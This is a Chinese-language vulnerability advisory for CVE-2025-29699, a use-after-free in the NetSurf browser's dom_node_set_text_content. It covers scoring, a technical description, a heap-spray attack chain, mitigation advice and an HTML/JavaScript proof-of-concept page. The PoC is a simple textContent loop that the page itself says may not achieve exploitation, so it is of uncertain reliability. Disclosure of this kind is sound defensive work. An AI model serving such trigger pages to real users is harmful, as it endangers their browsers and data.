NetSurf 3.11 dom_node_set_text_content函数释放后使用漏洞(CVE-2025-29699)

漏洞信息

漏洞编号

CVE-2025-29699

漏洞类型

释放后使用(Use After Free)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NetSurf

漏洞概述

CVE-2025-29699是NetSurf浏览器3.11版本中的一个安全漏洞，属于释放后使用(Use After Free)类型。该漏洞存在于DOM节点文本内容设置功能中，当处理网页DOM树的文本节点时，由于不当的内存管理，可能导致已释放的内存被继续访问。攻击者可以通过构造恶意网页触发该漏洞，当用户使用NetSurf浏览器访问该网页时，攻击者可能实现信息泄露或在特定条件下执行任意代码。此漏洞的CVSS评分为6.5，属于中等严重程度，主要影响系统的机密性和完整性。NetSurf是一款开源的网页浏览器，广泛应用于嵌入式系统和轻量级桌面环境，因此该漏洞可能影响多种使用该浏览器的设备。

技术细节

该漏洞位于NetSurf浏览器的DOM处理模块中，具体在dom_node_set_text_content函数实现中。问题根源在于对象生命周期管理不当：当函数执行过程中释放了某个DOM节点对象后，由于存在对该对象的悬空指针引用，代码后续仍尝试访问该已释放内存区域。这种情况通常发生在复杂的DOM操作序列中，特别是在文本内容替换场景下。攻击者可以通过精心构造的HTML/JavaScript代码触发特定的对象释放路径，然后利用悬空指针进行进一步操作。虽然该漏洞主要导致信息泄露风险(机密性低影响)，但在某些利用场景下可能扩展到完整性影响(低影响)。攻击者可能通过堆喷射或内存布局控制技术，在释放后使用的窗口期内实现代码执行。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意代码的网页，诱使目标用户访问

STEP 2

步骤2

恶意网页中的JavaScript代码触发特定的DOM操作序列

STEP 3

步骤3

dom_node_set_text_content函数执行过程中释放DOM节点对象

STEP 4

步骤4

代码中存在对已释放对象的悬空指针引用

STEP 5

步骤5

攻击者通过堆操作技术控制已释放内存区域的内容

STEP 6

步骤6

后续代码访问悬空指针，读取/写入被控内存，导致信息泄露或代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-29699 PoC - NetSurf Use After Free
// This PoC demonstrates triggering the UAF in dom_node_set_text_content
// Note: Actual exploitation requires specific memory layout conditions

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-29699 PoC</title>
</head>
<body>
    <div id="target">Initial Text</div>
    <script>
        // Attempt to trigger UAF condition in dom_node_set_text_content
        function triggerUAF() {
            const target = document.getElementById('target');
            
            // Create conditions that may lead to UAF
            for (let i = 0; i < 100; i++) {
                // Rapidly modify text content to trigger race condition
                target.textContent = "Text" + i;
                // Force garbage collection if available
                if (window.gc) window.gc();
            }
            
            // Access after potential free
            console.log(target.textContent);
        }
        
        // Trigger the vulnerability
        triggerUAF();
    </script>
</body>
</html>

影响范围

NetSurf < 3.11

NetSurf 3.11

防御指南

临时缓解措施

在官方修复发布前，建议限制使用NetSurf浏览器访问不可信网站，保持系统和安全软件的更新。对于必须使用NetSurf的场景，可考虑启用额外的浏览器安全插件或使用其他已修复的主流浏览器作为替代方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-29699
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-29699
3 Details https://www.cvedetails.com/cve/CVE-2025-29699/
4 VulDB https://vuldb.com/cve/CVE-2025-29699
5 Link https://github.com/Fysac/netsurf-disclosure/tree/main/CVE-2025-29699
6 Link https://www.netsurf-browser.org/